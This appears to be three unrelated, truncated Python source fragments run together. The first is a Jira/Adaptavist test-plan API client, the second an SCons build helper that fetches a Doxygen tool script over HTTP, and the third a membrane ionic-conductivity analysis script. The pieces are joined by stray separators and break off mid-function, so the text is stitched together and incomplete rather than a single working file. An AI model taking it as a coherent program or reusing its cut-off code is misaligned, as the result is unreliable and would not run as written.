if not self._put(request_url, request_data):
return False
return True
def unlink_test_cases(self, issue_key: str, test_case_keys: List[str]) -> bool:
"""
Unlink a list of existing testcases from an issue.
:param issue_key: Issue to unlink the test cases from
:param test_case_keys: List of test case keys to be unlinked from the issue
:returns: True if succeeded, False if not
"""
for test_case_key in test_case_keys:
response = self.get_test_case(test_case_key)
if not response:
self._logger.warning("Test case %s was not found", test_case_key)
continue
# remove issue from the current list of issue links
request_url = f"{self._adaptavist_api_url}/testcase/{test_case_key}"
issue_links = response.get("issueLinks", [])
if issue_key in issue_links:
issue_links.remove(issue_key)
request_data = {"issueLinks": issue_links}
self._logger.debug("Removing links from test case %s", test_case_key)
if not self._put(request_url, request_data):
return False
return True
def get_test_plan(self, test_plan_key: str) -> Dict[str, Any]:
"""
Get info about a test plan.
:param test_plan_key: Test plan key to look for
:returns: Info about test plan
"""
request_url = f"{self._adaptavist_api_url}/testplan/{test_plan_key}"
self._logger.debug("Getting test plan %s", test_plan_key)
request = self._get(request_url)
return request.json() if request else {}
def get_test_plans(self, search_mask: str = "folder <= \"/\"") -> List[Dict[str, Any]]:
"""
Get a list of test plans matching the search mask.
Unfortunately, /testplan/search does not support empty query, so we use a basic filter here to get all test plans, if no search mask is given.
:param search_mask: Search mask to match test plans
:returns: List of test plans
"""
test_plans: List[Dict[str, Any]] = []
i = 0
while True:
request_url = f"{self._adaptavist_api_url}/testplan/search?query={quote_plus(search_mask)}&startAt={i}"
self._logger.debug("Asking for test plans with search mask '%s' starting at %i", search_mask, i + 1)
request = self._get(request_url)
result = request.json() if request else []
if not result:
break
test_plans = [*test_plans, *result]
i += len(result)
return test_plans
def create_test_plan(self, project_key: str, test_plan_name: str, **kwargs: Any) -> Optional[str]:
"""
Create a new test plan.
:param project_key: Project key of the test plan ex. "TEST"
:param test_plan_name: Name of the test plan to be created
:key folder: Name of the folder where to create the new test plan
:key objective: Objective of the new test plan
:key status: Status of the test case (e.g. "Draft" or "Approved")
:key labels: List of labels to be added
:key issue_links: List of issue keys to link the new test plan to
:key test_runs: List of test run keys to be linked to the test plan ex. ["TEST-R2","TEST-R7"]
:return: Key of the test plan created
"""
folder: str = f"/{kwargs.pop('folder', '')}".replace("//", "/") # Folders always need to start with /
objective: str = kwargs.pop("objective", "")
status: str = kwargs.pop("status", STATUS_APPROVED)
labels: List[str] = kwargs.pop("labels", [])
issue_links: List[str] = kwargs.pop("issue_links", [])
test_runs: List[str] = kwargs.pop("test_runs", [])
raise_on_kwargs_not_empty(kwargs)
self.create_folder(project_key=project_key, folder_type=TEST_PLAN, folder_name=folder)
request_url = f"{self._adaptavist_api_url}/testplan"
request_data = {
"projectKey": project_key,
"name": test_plan_name,
"folder": None if folder == "/" else folder, # The API uses null for the root folder
"status": status,
"objective": objective,
"labels": labels,
"issueLinks": issue_links,
"testRunKeys": test_runs,
}
self._logger.debug("Creating test plan %s in project %s", test_plan_name, project_key)
request = self._post(request_url, request_data)
return request.json()["key"] if request else None
def edit_test_plan(self, test_plan_key: str, **kwargs: Any) -> bool:
"""
Edit given test plan.
:param test_plan_key: Test plan key to be edited. ex. "<KEY>"
:key folder: Folder to move the test plan into
:key name: Name of the test plan
:key objective: Objective of the test plan
:key status: Status of the test case (e.g. "Draft" or "Approved")
:key labels: List of labels to be added (add a "-" as first list entry to create a new list)
:key issue_links: List of issue keys to link the test plan to (add a "-" as first list entry to create a new list)
:key test_runs: List of test run keys to be linked/added to the test plan ex. ["TEST-R2","TEST-R7"] (add a "-" as first list entry to create a new list)
:returns: True if succeeded, False if not
"""
folder: Optional[str] = kwargs.pop("folder", None)
name: str = kwargs.pop("name", "")
objective: str = kwargs.pop("objective", "")
status: str = kwargs.pop("status", "")
labels: List[str] = kwargs.pop("labels", [])
issue_links: List[str] = kwargs.pop("issue_links", [])
test_runs: List[str] = kwargs.pop("test_runs", [])
raise_on_kwargs_not_empty(kwargs)
response = self.get_test_plan(test_plan_key)
if not response:
return False
request_url = f"{self._adaptavist_api_url}/testplan/{test_plan_key}"
request_data = {
"name": name or response.get("name"),
"objective": objective or response.get("objective"),
"status": status or response.get("status"),
}
if folder is not None:
folder = f"/{folder}".replace("//", "/")
self.create_folder(project_key=response["projectKey"], folder_type=TEST_CASE, folder_name=folder)
request_data["folder"] = folder if folder != "/" else None
# append labels, test runs and issue links to the current list or create new ones
update_field(response.get("labels", []), request_data, "labels", labels)
update_field([test_run["key"] for test_run in response.get("testRuns", [])], request_data, "testRuns", test_runs)
update_field(response.get("issueLinks", []), request_data, "issueLinks", issue_links)
self._logger.debug("Updating test plan %s", test_plan_key)
return bool(self._put(request_url, request_data))
def get_test_run(self, test_run_key: str) -> Dict[str, Any]:
"""
Get info about a test run.
:param test_run_key: Test run key to look for
:returns: Info about the test run
"""
request_url = f"{self._adaptavist_api_url}/testrun/{test_run_key}"
self._logger.debug("Getting test run %s", test_run_key)
request = self._get(request_url)
return request.json() if request else {}
def get_test_run_by_name(self, test_run_name: str) -> Dict[str, Any]:
"""
Get info about a test run (last one found by name).
.. note:: This method is using JIRA API as Adaptavist API does not support this properly (would be too slow to get this info).
:param test_run_name: Test run name to look for
:returns: Info about the test run
"""
test_runs: List[Dict[str, Any]] = []
i = 0
search_mask = quote_plus(f"testRun.name = \"{test_run_name}\"")
while True:
request_url = f"{self.jira_server}/rest/tests/1.0/testrun/search?startAt={i}&maxResults=10000&query={search_mask}&fields=id,key,name"
self._logger.debug("Asking for 10000 test runs starting at %i", i + 1)
request = self._get(request_url)
results = [] if not request else request.json()["results"]
if not results:
break
test_runs = [*test_runs, *results]
i += len(results)
return {key: test_runs[-1][key] for key in ["key", "name"]} if test_runs else {}
def get_test_runs(self, search_mask: str = "folder = \"/\"", **kwargs: Any) -> List[Dict[str, Any]]:
"""
Get a list of test runs matching the search mask.
Unfortunately, /testrun/search does not support empty query, so we use a basic filter here to get all test runs, if no search mask is given.
:param search_mask: Search mask to match test runs
:key fields: Comma-separated list of fields to be included (e.g. key, name, items)
.. note:: If fields is not set, all fields will be returned. This can be slow as it will also also include test result items.
:returns: List of | |
# -*- python -*-
#/******************************************************************************
# * Copyright (c) 2004, 2009 <NAME>.
# * All rights reserved. This program and the accompanying materials
# * are made available under the terms of the Eclipse Public License v1.0
# * which accompanies this distribution, and is available at
# * http://www.eclipse.org/legal/epl-v10.html
# *****************************************************************************/
DEFAULT_BIN_DIR = 'bin'
DEFAULT_LIB_DIR = 'lib'
DEFAULT_DOC_DIR = 'doc'
DEFAULT_SKIP_DIRS = ['.*', 'CVS', 'bin', 'lib', 'doc']
DEFAULT_CXX_GLOB = ['*.c', '*.cc', '*.cpp', '*.cxx']
DEFAULT_BASE_VARIANT_DIR = '.build'
DEFAULT_DOXYGEN_CONFIGFILE = 'doxygen.cfg'
DEFAULT_UNITTEST_DIR_NAME = 'test'
DEFAULT_UNITTEST_TEST_PREFIX = 'test-'
DEFAULT_UNITTEST_LIB_PREFIX = 'test-'
DEFAULT_UNITTEST_LIB_DIR = ''
DEFAULT_UNITTEST_LIB = ''
DEFAULT_UNITTEST_INCLUDE_DIR = ''
DEFAULT_UNITTEST_TESTRUNNER = ''
DEFAULT_SCONSBUILDER_CONFIG_FILE_NAME = '.scb'
import fnmatch
import glob
import os
import re
import string
import SCons.Script
# SconsBuilder may work with earlier version,
# but it was build and tested against SCons 1.0.0
#SCons.Script.EnsureSConsVersion(1,0,0)
# SconsBuilder may work with earlier version,
# but it was build and tested against Python 2.4
SCons.Script.EnsurePythonVersion(2,4)
try:
import SconsBuilderConfig
except:
print 'Generating default SconsBuilderConfig.py'
configfile = open('SconsBuilderConfig.py', 'w')
configfile.write('# -*- python -*-\n')
configfile.write('# This file was automatically generated\n')
configfile.write('# Do NOT edit this file when using the Eclipse SconsBuilder plugin!\n')
configfile.write('# The Eclipse SconsBuilder plugin WILL overwrite this file!\n')
configfile.write('\n')
configfile.write('BASE_VARIANT_DIR = ' + repr(DEFAULT_BASE_VARIANT_DIR) + '\n')
configfile.write('\n')
configfile.write('BUILD_CONFIGURATIONS = []\n')
configfile.write('BUILD_CONFIGURATION = None\n')
configfile.write('\n')
configfile.write('BUILD_TARGETS = []\n')
configfile.write('BUILD_TARGET = None\n')
configfile.write('\n')
configfile.write('BIN_DIR = ' + repr(DEFAULT_BIN_DIR) + '\n')
configfile.write('LIB_DIR = ' + repr(DEFAULT_LIB_DIR) + '\n')
configfile.write('DOC_DIR = ' + repr(DEFAULT_DOC_DIR) + '\n')
configfile.write('\n')
configfile.write('DOXYGEN_CONFIGFILE = ' + repr(DEFAULT_DOXYGEN_CONFIGFILE) + '\n')
configfile.write('\n')
configfile.write('UNITTEST_ENABLED = False\n')
configfile.write('UNITTEST_DIR_NAME = ' + repr(DEFAULT_UNITTEST_DIR_NAME) + ' \n')
configfile.write('UNITTEST_TEST_PREFIX = ' + repr(DEFAULT_UNITTEST_TEST_PREFIX) + ' \n')
configfile.write('UNITTEST_LIB_PREFIX = ' + repr(DEFAULT_UNITTEST_LIB_PREFIX) + ' \n')
configfile.write('UNITTEST_INCLUDE_DIR = ' + repr(DEFAULT_UNITTEST_INCLUDE_DIR) + '\n')
configfile.write('UNITTEST_LIB_DIR = ' + repr(DEFAULT_UNITTEST_LIB_DIR) + '\n')
configfile.write('UNITTEST_LIB = ' + repr(DEFAULT_UNITTEST_LIB) + '\n')
configfile.write('UNITTEST_TESTRUNNER = ' + repr(DEFAULT_UNITTEST_TESTRUNNER) + '\n')
configfile.write('\n')
configfile.write('SKIP_DIRS = ' + repr(DEFAULT_SKIP_DIRS) + '\n')
configfile.write('\n')
configfile.write('CXX_GLOB = ' + repr(DEFAULT_CXX_GLOB) + '\n')
configfile.write('\n')
configfile.write('SCONSBUILDER_CONFIG_FILE_NAME = ' + repr(DEFAULT_SCONSBUILDER_CONFIG_FILE_NAME) + '\n')
configfile.write('\n')
configfile.close()
import SconsBuilderConfig
SCB_LAUNCH_DIR = SCons.Script.GetLaunchDir()
SCB_SCRIPT_DIR = os.getcwd()
allEnvironments = {}
def addCommandLineOptions():
SCons.Script.AddOption(
'--buildconfiguration',
dest='buildconfiguration',
nargs=1,
type='string',
action='store',
metavar='CONFIGURATION',
default=SconsBuilderConfig.BUILD_CONFIGURATION,
help='select a build configuration (e.g. debug, release, ...)'
)
SCons.Script.AddOption(
'--buildtarget',
dest='buildtarget',
nargs=1,
type='string',
action='store',
metavar='TARGET',
default=SconsBuilderConfig.BUILD_TARGET,
help='select a build target (e.g. linux, winXP, ...)'
)
SCons.Script.AddOption(
'--verbosity',
dest='verbosity',
nargs=1,
type='int',
action='store',
metavar='INTEGER',
default=1,
help='select the verbosity level (0..n)'
)
SCons.Script.AddOption(
'--showcommands',
dest='showcommands',
action='store_true',
default=False,
help='show commands executed'
)
SCons.Script.AddOption(
'--dist',
dest='dist',
action='store_true',
default=False,
help='make the GINI distribution file (tar gzipped)'
)
SCons.Script.AddOption(
'--install',
dest='install',
action='store_true',
default=False,
help='install the binary files in the proper location... '
)
SCons.Script.AddOption(
'--documentation',
dest='documentation',
action='store_true',
default=False,
help='build doxygen documentation'
)
SCons.Script.AddOption(
'--doxygenfile',
dest='doxygenfile',
nargs=1,
type='string',
action='store',
metavar='DOXYFILE',
default=SconsBuilderConfig.DOXYGEN_CONFIGFILE,
help='specify the doxygen config file'
)
SCons.Script.AddOption(
'--forcemodified',
dest='forcemodified',
nargs=1,
type='string',
action='append',
metavar='SOURCEFILE',
default=[],
help='pretend that SOURCEFILE was modified'
)
SCons.Script.AddOption(
'--nice',
dest='nice',
nargs=1,
type='int',
action='store',
metavar='INTEGER',
default=10,
help='select the nice level (process priority adjustment) (0..n)'
)
def printBuild(env):
target = tryGetEnvironment(env, 'SCB_BUILD_TARGET')
config = tryGetEnvironment(env, 'SCB_BUILD_CONFIGURATION')
if config and target:
space = ' '
else:
space = ''
print # new line
print (
'Building %s (%s%s%s)' %
(
relativePath(SCB_SCRIPT_DIR),
tryGetEnvironment(env, 'SCB_BUILD_TARGET', default=''),
space,
tryGetEnvironment(env, 'SCB_BUILD_CONFIGURATION', default='')
)
)
def printCmdLine(s, target, src, env):
if not SCons.Script.GetOption('showcommands'):
s = '\n'.join([ \
entry.builder.get_name(env) + "('" + \
str(entry) + "')" for entry in target \
])
log(1, [s])
def log(level, messages):
if verbosity() >= level:
for message in messages:
print(message)
def tryGetEnvironment(env, key, default=None, emptyOk=True):
value = default
try:
value = env[key]
try:
length = len(value)
if length == 0 and emptyOk:
value = value
else:
pass
except:
pass
except:
pass
log(12, ['tryGetEnvironment: env[%s]=%s' % (key, value)])
return value
def relativePath(path, base=SCB_SCRIPT_DIR, prefix=True):
if prefix:
base = os.path.dirname(base)
newpath = string.replace(
path,
os.path.commonprefix([base, path]),
''
)
if len(newpath) >=1 and newpath[0] == '/':
return newpath[1:]
else:
return newpath
def listDirectories(path, skip=[]):
dirs = []
if path == '':
path = '.'
dirlist = sorted(
[item for item in os.listdir(path)
if os.path.isdir(os.path.join(path,item))]
)
log(20, ['dirlist=%s' % (dirlist)])
for npath in dirlist:
dirs.append(npath)
name = os.path.basename(npath)
for check in skip:
match = fnmatch.fnmatch(name, check)
if match:
try:
dirs.remove(npath)
except:
pass
return dirs
def mkdir(newdir):
"""works the way a good mkdir should :)
- already exists, silently complete
- regular file in the way, raise an exception
- parent directory(ies) does not exist, make them as well
"""
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError("a file with the same name as the desired " \
"dir, '%s', already exists." % newdir)
else:
head, tail = os.path.split(newdir)
if head and not os.path.isdir(head):
mkdir(head)
if tail:
os.mkdir(newdir)
def verbosity():
try:
return SCons.Script.GetOption('verbosity')
except:
return 1
def getEnvironment(path):
try:
return allEnvironments[os.path.abspath(path)]
except:
return None
def rootEnvironment():
return getEnvironment(SCB_SCRIPT_DIR)
def printEnv(verbosity, env):
if verbosity >= 15:
print
print env.Dump()
elif verbosity >= 14:
print
print 'env[\'SCB_LAUNCH_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_LAUNCH_DIR'))
print 'env[\'SCB_SCRIPT_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_SCRIPT_DIR'))
print 'env[\'SCB_BASE_VARIANT_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_BASE_VARIANT_DIR'))
print 'env[\'SCB_VARIANT_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_VARIANT_DIR'))
print 'env[\'SCB_BIN_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_BIN_DIR'))
print 'env[\'SCB_LIB_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_LIB_DIR'))
print 'env[\'SCB_DOC_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_DOC_DIR'))
print 'env[\'SCB_ABSOLUTE_PATH\']=%s' % (tryGetEnvironment(env, 'SCB_ABSOLUTE_PATH'))
print 'env[\'SCB_RELATIVE_PATH\']=%s' % (tryGetEnvironment(env, 'SCB_RELATIVE_PATH'))
print 'env[\'SCB_UNITTEST_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_MODIFY'))
print 'env[\'SCB_UNITTESTRUNNER_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTESTRUNNER_MODIFY'))
print 'env[\'SCB_FILE_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_FILE_MODIFY'))
print 'env[\'SCB_BUILD_CONFIGURATION\']=%s' % (tryGetEnvironment(env, 'SCB_BUILD_CONFIGURATION'))
print 'env[\'SCB_BUILD_TARGET\']=%s' % (tryGetEnvironment(env, 'SCB_BUILD_TARGET'))
print 'env[\'SCB_PREPARE_OBJECT_TARGETS\']=%s' % (tryGetEnvironment(env, 'SCB_PREPARE_OBJECT_TARGETS'))
print 'env[\'SCB_PREPARE_LIBRARY_TARGETS\']=%s' % (tryGetEnvironment(env, 'SCB_PREPARE_LIBRARY_TARGETS'))
print 'env[\'SCB_PREPARE_EXECUTABLE_TARGETS\']=%s' % (tryGetEnvironment(env, 'SCB_PREPARE_EXECUTABLE_TARGETS'))
print 'env[\'SCB_SCONS_TARGETS\']=%s' % (tryGetEnvironment(env, 'SCB_SCONS_TARGETS'))
print 'env[\'SCB_SKIP_DIRS\']=%s' % (tryGetEnvironment(env, 'SCB_SKIP_DIRS'))
print 'env[\'SCB_CXX_GLOB\']=%s' % (tryGetEnvironment(env, 'SCB_CXX_GLOB'))
print 'env[\'SCB_CXX_SKIP\']=%s' % (tryGetEnvironment(env, 'SCB_CXX_SKIP'))
print 'env[\'SCB_UNITTEST_ENABLED\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_ENABLED'))
print 'env[\'SCB_UNITTEST_DIR_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_DIR_NAME'))
print 'env[\'SCB_UNITTEST_TEST_PREFIX\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_TEST_PREFIX'))
print 'env[\'SCB_UNITTEST_LIB_PREFIX\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_LIB_PREFIX'))
print 'env[\'SCB_UNITTEST_LIB_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_LIB_DIR'))
print 'env[\'SCB_UNITTEST_LIB\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_LIB'))
print 'env[\'SCB_UNITTEST_INCLUDE_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_INCLUDE_DIR'))
print 'env[\'SCB_UNITTEST_TESTRUNNER\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_TESTRUNNER'))
print 'env[\'SCB_UNITTEST_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_MODIFY'))
print 'env[\'SCB_PLATFORM\']=%s' % (tryGetEnvironment(env, 'SCB_PLATFORM'))
print 'env[\'SCB_SHARED_LIB_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_SHARED_LIB_NAME'))
print 'env[\'SCB_STATIC_LIB_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_STATIC_LIB_NAME'))
print 'env[\'SCB_EXECUTABLE_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_EXECUTABLE_NAME'))
elif verbosity >= 13:
print
print 'env[\'SCB_BASE_VARIANT_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_BASE_VARIANT_DIR'))
print 'env[\'SCB_VARIANT_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_VARIANT_DIR'))
print 'env[\'SCB_BIN_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_BIN_DIR'))
print 'env[\'SCB_LIB_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_LIB_DIR'))
print 'env[\'SCB_DOC_DIR\']=%s' % (tryGetEnvironment(env, 'SCB_DOC_DIR'))
print 'env[\'SCB_ABSOLUTE_PATH\']=%s' % (tryGetEnvironment(env, 'SCB_ABSOLUTE_PATH'))
print 'env[\'SCB_RELATIVE_PATH\']=%s' % (tryGetEnvironment(env, 'SCB_RELATIVE_PATH'))
print 'env[\'SCB_UNITTEST_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_UNITTEST_MODIFY'))
print 'env[\'SCB_FILE_MODIFY\']=%s' % (tryGetEnvironment(env, 'SCB_FILE_MODIFY'))
print 'env[\'SCB_SHARED_LIB_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_SHARED_LIB_NAME'))
print 'env[\'SCB_STATIC_LIB_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_STATIC_LIB_NAME'))
print 'env[\'SCB_EXECUTABLE_NAME\']=%s' % (tryGetEnvironment(env, 'SCB_EXECUTABLE_NAME'))
# allow to (re)build files by specifying the source(s)
def forcedDecider(dependency, target, prev_ni):
log(12, ['Checking dependency %s' % dependency])
if str(dependency) in SCons.Script.GetOption('forcemodified'):
log(1, ['Dependency %s is forced modified' % dependency])
return True
elif prev_ni and dependency.get_csig() != prev_ni.csig:
log(11, ['Dependency %s is modified' % dependency])
return True
return False
def prepareCallback(env, targets, useCallback=True):
for target in targets:
name = target.get_builder().get_name(env)
slot = None
try:
slot = env['SCB_SCONS_TARGETS'][name]
except:
log(12, [
'creating env[\'SCB_SCONS_TARGETS\'][\'%s\']' % (name)
])
env['SCB_SCONS_TARGETS'][name] = []
slot = env['SCB_SCONS_TARGETS'][name]
slot.append(target)
log(12, [
'env[\'SCB_SCONS_TARGETS\'][\'%s\']=%s' % (name, [str(x) for x in env['SCB_SCONS_TARGETS'][name]])
])
if useCallback and env['SCB_PREPARE_CALLBACK']:
env['SCB_PREPARE_CALLBACK'](env, targets)
def download(url, target = None):
import urllib
webFile = urllib.urlopen(url)
if target is None:
target = url.split('/')[-1]
localFile = open(target, 'w')
localFile.write(webFile.read())
webFile.close()
localFile.close()
def buildBaseEnvironment(
buildconfiguration=None,
buildtarget=None
):
env = None
try:
env = allEnvironments[None]
log(10, ['Returning base environment'])
except:
log(10, ['Creating base environment'])
# build a primitive base environment that allows us to select
# the platform based on buildconfiguration and buildtarget
if not buildconfiguration:
buildconfiguration = SCons.Script.GetOption('buildconfiguration'),
if not buildtarget:
buildtarget = SCons.Script.GetOption('buildtarget')
baseenv = SCons.Script.Environment(
SCB_LAUNCH_DIR = SCB_LAUNCH_DIR,
SCB_SCRIPT_DIR = SCB_SCRIPT_DIR,
SCB_BUILD_CONFIGURATION = buildconfiguration,
SCB_BUILD_TARGET = buildtarget,
SCB_VERBOSE=0,
SCB_PLATFORM = SCons.Script.Platform()
)
updateEnvironment(baseenv, SCB_SCRIPT_DIR, ['SCB_PLATFORM'])
url = 'http://www.scons.org/wiki/DoxygenBuilder?action=AttachFile&do=get&target=doxygen.py'
doxygenbuilderfilename = 'SconsBuilderDoxygen.py'
print('checking for ' + doxygenbuilderfilename)
if not os.path.exists(doxygenbuilderfilename):
print('downloading ' + url)
download(
url,
doxygenbuilderfilename
)
print('checking for ' + doxygenbuilderfilename + ' done')
env = SCons.Script.Environment(
tools = ['default', 'SconsBuilderDoxygen'],
toolpath = '.',
SCB_LAUNCH_DIR = SCB_LAUNCH_DIR,
SCB_SCRIPT_DIR = SCB_SCRIPT_DIR,
SCB_BASE_VARIANT_DIR = SconsBuilderConfig.BASE_VARIANT_DIR,
SCB_VARIANT_DIR = '',
SCB_BIN_DIR = None,
SCB_LIB_DIR = None,
SCB_DOC_DIR = SconsBuilderConfig.DOC_DIR,
SCB_ABSOLUTE_PATH = SCB_SCRIPT_DIR,
SCB_RELATIVE_PATH = '',
SCB_BUILD_CONFIGURATION = SCons.Script.GetOption('buildconfiguration'),
SCB_BUILD_TARGET = SCons.Script.GetOption('buildtarget'),
SCB_PREPARE_OBJECT_TARGETS = [prepareObjectTargets],
SCB_PREPARE_LIBRARY_TARGETS = [prepareLibraryTargets],
SCB_PREPARE_EXECUTABLE_TARGETS = [prepareExecutableTargets, prepareUnittestTargets],
SCB_SCONS_TARGETS = {},
SCB_SKIP_DIRS = SconsBuilderConfig.SKIP_DIRS,
SCB_CXX_GLOB = SconsBuilderConfig.CXX_GLOB,
SCB_CXX_SKIP = SCons.Util.CLVar(),
SCB_UNITTEST_ENABLED = SconsBuilderConfig.UNITTEST_ENABLED,
SCB_UNITTEST_DIR_NAME = SconsBuilderConfig.UNITTEST_DIR_NAME,
SCB_UNITTEST_TEST_PREFIX = | |
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from past.utils import old_div
import argparse
from LLC_Membranes.analysis import Atom_props, Diffusivity, Poly_fit
from LLC_Membranes.llclib import physical
import matplotlib.pyplot as plt
import time
import numpy as np
import mdtraj as md
import tqdm
"""
The purpose of this script is to calculate the ionic conductivity of a given LLC membrane using the Nernst Einstein
relation (Method 1) and the Collective Diffusion model (Method 2), the latter being described in the following paper:
<NAME> and <NAME> "Collective diffusion model for ion conduction through microscopic channels," Biophysical Journal,
vol 104, no. 2, pp. 368-376, Jan. 2013.
Ionic conductivity quantifies the movement of ions from site to site through defects in the crystal lattice of
ionic solids or aqueous solutions.
METHOD 1: Nernst Einstein
METHOD 2: Collective Diffusion
To calculate the ionic conductivity, we need to know the current of ions. For current through a channel we define the
current through the channel as:
I = sum ( e_i * v_i / Lc ) (1)
where e and v are the charge and velocity of components i located in the channel. Lc is the channel length defined by
two planes at z1 and z2. Thus Lc = z2 - z1. Equation (1), on average, is the same as the current through the entire
system.
The charge transfer through the channel is defined as:
Q(t) = integral[0, t](I(t)dt) (2)
One can use the equilibrium relation between the mean square displacement of Q and its velocity autocorrelation function
<Q^2(t)> = 2*integral[0, t]dt'(t - t')<I(0)I(t')> (3)
The equilibrium diffusion coefficient of Q, Dq, is given by:
Dq = integral[0, infinity](dt*expected_value(I(0)*I(t))) (4)
Alternatively, we can plot Q(t), find its slope in the linear region and get Dq (much like calculating diffusion
coefficients). Define the change in Q between each time step as:
delta_Q = sum(e_i*delta_z/Lc) (5)
Where we sum over atoms located within the channel region bounded by z_max and z_min. e_i is the charge of atom i.
delta_z is the net displacement of an atom. If an atom exits or enters the boundaries between time steps, delta_z is
taken only as the displacement of the atom within the channel region. For LLC membranes, the channel membrane is taken
as the entire membrane cross section bounded by z_max and z_min since we are looking at bulk properties as opposed to
pure channel conduction. We then cumulate the delta_Qs to construct Q(t). Finding the slope of the linear region will
give the value for Dq. Simulations need to be run for a long time to get accurate values. (LLC systems should be run for
a microsecond or longer to give accurate values)
The steady state current is given by:
I_steady = (Dq * V) / (k_b * T) (6)
Solving for I/V gives the system conductance:
c = Dq / (k_b * T) (7)
This can be used to calculate the ionic conductance with an equilibrium simulation
ALTERNATIVE METHODS:
We can calculate conductance directly from current and voltage if an electric field is applied across the
membrane. To do so, calculate the average current using a time average of equation (1) and the potential difference
across the membrane (which can be found using gmx potential with a careful look at the output .xvg file).
One can also employ the Computational Electrophysiology Module included with GROMACS to create a double layer membrane
system which maintains a concentration gradient across the membrane, inducing a current.
"""
def initialize():
parser = argparse.ArgumentParser(description='Calculate Ionic Conductivity using the Nernst Einstein relation or'
'the Collective Diffusion Model')
parser.add_argument('-t', '--traj', default='wiggle.trr', type=str, help='Trajectory file (.xtc or .trr)'
'IMPORTANT: Pre-process the trajectory with gmx trjconv -pbc nojump for NE')
parser.add_argument('-g', '--gro', default='wiggle.gro', type=str, help='Coordinate file')
parser.add_argument('-d', '--build_mon', default='NAcarb11V', type=str, help='Monomer with which the system was '
'built')
parser.add_argument('-i', '--ion', default='NA', help='Name of ion(s) being used to calculate ionic conductivity')
parser.add_argument('-b', '--buffer', default=0, type=float, help='Distance into membrane from min and max where '
'current measurements will be made')
parser.add_argument('-T', '--temp', default=300, type=float, help='System Temperature, Kelvin')
parser.add_argument('-B', '--nboot', default=200, type=int, help='Number of bootstrap trials to be run')
parser.add_argument('-m', '--nMC', default=1000, help='Number of Monte Carlo trials to estimate error in D and Dq')
parser.add_argument('-S', '--suffix', default='saved',
help='Suffix to append to position and id arrays when saving')
parser.add_argument('-r', '--frontfrac', default=0.16, type=float, help='Where to start fitting line for diffusivity'
'calc')
parser.add_argument('-F', '--fracshow', default=0.5, type=float, help='Percent of graph to show, also where to stop'
'fitting line during diffusivity calculation')
parser.add_argument('--nTsub', default=20, type=int, help='Number of subtrajectories to break into for generating '
'stats')
parser.add_argument('-M', '--method', default='NE', help='Which method to use to calculate Ionic Conductivity: CD ='
'Collective Diffusion, NE = Nernst Einstein, B = both')
parser.add_argument('-l', '--load', help='Load arrays if they were saved from a previous calculation',
action="store_true")
parser.add_argument('--discard', type=int, help='Specify the number of nanoseconds to discard starting'
'from the beginning of the simulation')
parser.add_argument('-begin', default=0, type=int, help='Frame to begin using data')
parser.add_argument('--noshow', action="store_true", help='Specify this to not show any plots')
parser.add_argument('-a', '--axis', default='xyz', type=str, help='Which axis to compute msd along')
args = parser.parse_args()
return args
def nernst_einstein(D, D_std, C, C_std, T):
"""
:param D: calculated diffusivity
:param D_std: error in calculated diffusivity
:param C: concentration of ions in membrane
:param C_std: error in concentration
:param T: temperature simulation is run at, float
:return: Ionic Conductivity as calculated by the nernst einsten relation
"""
NE_av = q ** 2 * C * D / (kb * T)
NE_error = NE_av * np.sqrt((old_div(D_std, D)) ** 2 + (old_div(C_std, C)) ** 2)
return NE_av, NE_error
def dQ(frame, positions, channel_length, zmax, zmin, charges, id):
q = 0
for i in range(positions.shape[1]): # find out how far each ion has moved in the z direction this frame
curr = positions[frame, i, 2] # current z position
prev = positions[frame - 1, i, 2] # previous z position
if zmin <= curr <= zmax: # check that the ion is in the channel over which we are measuring
current_frame = curr # If it, that is its position at the current frame
elif curr > zmax: # If the particle is above zmax, we are still potentially interested in it
current_frame = zmax
elif curr < zmin: # If the particle is below zmin, we are still potentially interested in it
current_frame = zmin
if zmin <= prev <= zmax: # Do the same checks on the particle from the previous frame
prev_frame = prev
elif prev > zmax:
prev_frame = zmax
elif prev < zmin:
prev_frame = zmin
displacement = current_frame - prev_frame
q += e * (charges[id[i]]) * displacement / channel_length
return q
def dQ2(z, zmax, zmin, charges, id):
"""
Calculate the displacement of all positions from frame to frame
:param z: trajectory of positions [nframes, npoints, 1] --> z-direction only
:return: a trajectory n(t) describing the delta n at each time step
"""
q = np.zeros(z.shape[0])
for t in tqdm.tqdm(range(1, q.shape[0])):
for i in range(z.shape[1]):
current = z[t, i]
previous = z[t - 1, i]
if zmax >= current >= zmin:
if zmax >= previous >= zmin:
q[t] += (current - previous)*charges[id[i]]
elif previous > zmax:
q[t] += (current - zmax)*charges[id[i]]
elif previous < zmin:
q[t] += (current - zmin)*charges[id[i]]
elif current > zmax:
if zmax >= previous >= zmin:
q[t] += (zmax - previous)*charges[id[i]]
elif current < zmin:
if zmax >= previous >= zmin:
